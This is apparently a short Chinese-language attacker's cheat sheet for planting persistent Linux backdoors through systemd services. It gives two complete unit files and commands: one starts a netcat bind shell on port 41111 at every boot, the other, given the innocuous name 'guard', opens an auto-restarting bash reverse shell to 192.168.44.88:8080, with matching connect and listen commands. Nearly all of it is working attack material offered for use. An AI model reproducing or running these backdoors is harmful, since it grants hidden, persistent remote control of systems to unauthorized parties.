系统重启开bindshell后门

cat /usr/lib/systemd/system/backdoor.service <<EOF
[Unit]
Description=Just a simple backdoor for test
After=network.target
[Service]
Type=forking
ExecStart=bash -c "nc -l -p 41111 -e /bin/bash &"
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target

EOF

systemctl daemon-reload
systemctl enable backdoor #启用该配置，重启后开后门
systemctl start backdoor #启动该配置，立刻会开后门

nc 192.168.44.130 41111

创建类定时任务后门

cat /usr/lib/systemd/system/guard.service <<EOF
[Unit]
Description=guard
After=network.target

[Service]
Type=forking
ExecStart=/bin/bash -i > /dev/tcp/192.168.44.88/8080 0<&1 2>&1
Restart=always
RestartSec=12s

[Install]
WantedBy=default.target

EOF

systemctl daemon-reload
systemctl enable guard #启用该配置，重启后开后门
systemctl start guard #启动该配置，立刻会开后门

nc -lvvp 8080